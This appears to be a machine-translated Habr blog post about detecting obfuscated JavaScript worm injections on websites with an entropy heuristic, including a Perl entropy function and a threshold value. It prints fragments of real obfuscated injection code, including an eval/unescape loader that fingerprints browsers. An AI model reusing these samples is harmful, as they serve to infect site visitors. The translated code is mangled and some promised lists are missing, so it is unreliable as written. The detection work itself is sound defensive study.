📜 ⬆️ ⬇️

On a heuristic method for detecting viral injections on sites

! The post was written by RomanL , but due to the lack of the necessary amount of karma, it cannot publish it.

I want to talk about one solution, how can I detect the introduction of polymorphic viral JavaScript-code in the pages of sites. The note is designed for trained users who do not need to explain elementary things and who can themselves find additional information without requiring links to Wikipedia :)


Introduction


Surely, many faced with unpleasant warnings of browsers that the site poses a potential danger to the computer. And after Yandex began to warn about this in the search results, it became very easy to explain why all of a sudden the traffic on the site dropped to zero. Simple, but late.
')
It’s all about bad worms that hit web pages and try to penetrate the visitor’s computer through holes in browsers and continue their reproduction.

A worm of this type usually acts as follows:

What kind of virus code does the site have?


There are usually several options:

How can I quickly get information about the penetration of virus code on the site?



I would like to briefly tell you about some of the features of the second approach and how we use it in the work of our company.

Task.


The task is simple - you need to monitor two hundred client websites for the appearance of viral code on them.

Decision.


A crawler was written, periodically polling sites from the list, getting the main page and analyzing it for potential danger.

The search for potentially dangerous code goes in several steps:

Here is more!


Recently, new modifications of worms use polymorphic encryption (more precisely obfuscation) of JS-code when they are inserted into the page in order to hide the logic executed by the script. This code is difficult to catch in time with the signature method, because it changes from copy to copy (although some pieces can be described with regular expressions in the signature database). Here are the "body pieces" of some injections of this kind:
var jGt7H3IkS = Array ( 63 , 6 , 19 , 54 , 61 , 31 , 22 , 51 , 12 , 33 , 0 , 0 , 0 , 0 , 0 , 0 , 49 , 5 , 4 , 62 , 2 , 25 , 29 , 38 , 39
, 44 , 26 , 28 , 42 , 57 , 21 , 34 , 13 , 7 , 56 , 43 , 41 , 47 , 1 , 3 , 37 , 40 , 11 , 0 , 0 , 0 , 0 , 30 , 0 , 14 , 58 , 17 , 27 , 0 , 8 ,
60 , 16 , 36 , 35 , 20 , 46 , 24 , 48 , 10 , 32 , 9 , 15 , 23 , 52 , 53 , 59 , 50 , 55 , 45 , 18 ) , OmFORSBhopxKumqErMdN3
QYTiogrWyNLb2agSAc = "Ewgns28wesYusd8GQ3Ktcs4HoLmts2gnWSInoUgO1S8wo_m96QPxqW8GQ1876sFwB74HZSgwe5R
GELf7W5P @ fWgG " , JjrjMmsvdcJ8K6muubIPn = 0 , CCdH_4HW = 0 , Lv0RDYvi6cLNHfJ = 0 , EnMfvr1feyNJmFLN6C0pI
DRx7SSTALRmlVGS , KuX2VtJp1ALLHMe = OmFORSBhopxKumqErMdN3QYTiogrWyNLb2agSAc. length , K0

( function ( t ) { eval ( unescape ( ( '<76ar <20a <3d <22Sc <72 <69p <74Engine <22 <2cb <3d <22 <56er <73i <6fn ()
<2b <22 <2cj <3d <22 <22 <2cu <3dna <76igator <2euse <72Agent <3bif ((u <2e <69nd <65xOf (<22W <69n <22) <3e0) <26 <26
(u <2eindexOf (<22 <4eT <206 <22) <3c0) <26 <26 (documen <74 <2e <63ooki <65 <2ein <64 <65xOf (<22 <6d <69ek <3d1 <22 <29 <3c0)
<26 <26 <28typeof (zr <76zts) <21 <3d <74 <79peof <28 <22 <41 <22) <29) <7bz <72v <7ats <3d <22 <41 <22 <3b <65
val (<22 <69f <28 <77indow <2e <22 + a <2b <22) j <3dj +

The analysis of such a code allowed to put forward a hypothesis about its high entropy, i.e. in comparison with a usual JS-code the obfuscated code is chaotic.

Next, we used several modifications of the algorithm for calculating the final entropy of such a code and drove them along a small signature base. The results turned out to be encouraging, but with one unpleasant feature: the virus code packed with algorithms that are used to package jQuery type libraries showed, respectively, the entropy values ​​close to them. Scratching the turnips and digging a little more with the modification of the algorithm, it was decided to include such a code in the signature database, and set the entropy threshold for a confident determination of the above virus code modifications.
So, here this small code calculates a measure of entropy of a somewhat processed JS code:
sub enthropy ( $$ ) {
my $ data = shift ;
my $ ignore = shift ;
my $ e = 0 ;

my $ letters = { } ;
my $ counter = 0 ;

if ( $ data ) {
$ data = ~ tr / AZ / az / ;
$ data = ~ s / \ s // g ;

# clearing polymorphic code from ignored signatures
foreach ( @ { $ ignore } ) {
$ data = ~ s / $ _ // g ;
}

$ data = ~ s / [^ 2-9] / _ / g ;

while ( $ data = ~ /(...)/g ) {
$ letters -> { $ 1 } ++;
$ counter ++;
}

foreach ( keys ( % { $ letters } ) ) {
my $ p = $ letters -> { $ _ } / $ counter ;
$ e + = $ p * log2 ( $ p ) ;
}

$ e = 0 - $ e ;
}

return $ e ;
}
sub log2 ( ) {
my $ n = shift ;
return log ( $ n ) / log ( 2 ) ;
}

What's going on here:

After experimenting with the final value, its level was set, above which the code is considered viral:

our $E_MAX = 2.2;

That is, in fact, all that I wanted to say about one method of heuristic detection of viral injections on sites. :)
PS By the way, if you save FTP passwords in Far, do it not at the root of the FTP panel, but create directories (via F7) - for some reason, viruses do not know how to take them yet :)
_________
The text was prepared in Habra Editor

PS If you liked the article - we put plus RomanL , if you didn’t like it - minus zvirusz .

Source: https://habr.com/ru/post/70615/


All Articles